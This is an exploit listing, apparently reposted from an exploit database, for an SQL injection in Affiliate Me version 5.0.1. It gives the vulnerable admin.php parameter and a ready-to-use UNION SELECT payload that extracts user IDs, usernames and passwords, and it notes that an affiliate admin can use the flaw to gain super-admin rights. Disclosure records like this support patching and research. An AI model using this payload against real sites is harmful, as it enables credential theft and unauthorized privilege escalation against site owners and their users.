Exploit for Affiliate Me 5.0.1 SQL Injection

Name: Exploit for Affiliate Me 5.0.1 SQL Injection
Rating: 5 (96 reviews)

2023-05-23 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:172495
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection  
[#] Exploit Date: May 16, 2023.  
[#] CVSS 3.1: 6.4 (Medium)  
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N  
[#] Tactic: Initial Access (TA0001)  
[#] Technique: Exploit Public-Facing Application (T1190)  
[#] Application Name: Affiliate Me  
[#] Application Version: 5.0.1  
[#] Vendor: https://www.powerstonegh.com/  
  
  
[#] Author: h4ck3r - Faisal Albuloushi  
[#] Contact: SQL@hotmail.co.uk  
[#] Blog: https://www.0wl.tech  
  
  
[#] 3xploit:  
  
[path]/admin.php?show=reply&id=[Injected Query]  
  
  
[#] 3xample:  
  
[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -  
  
  
[#] Notes:  
- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.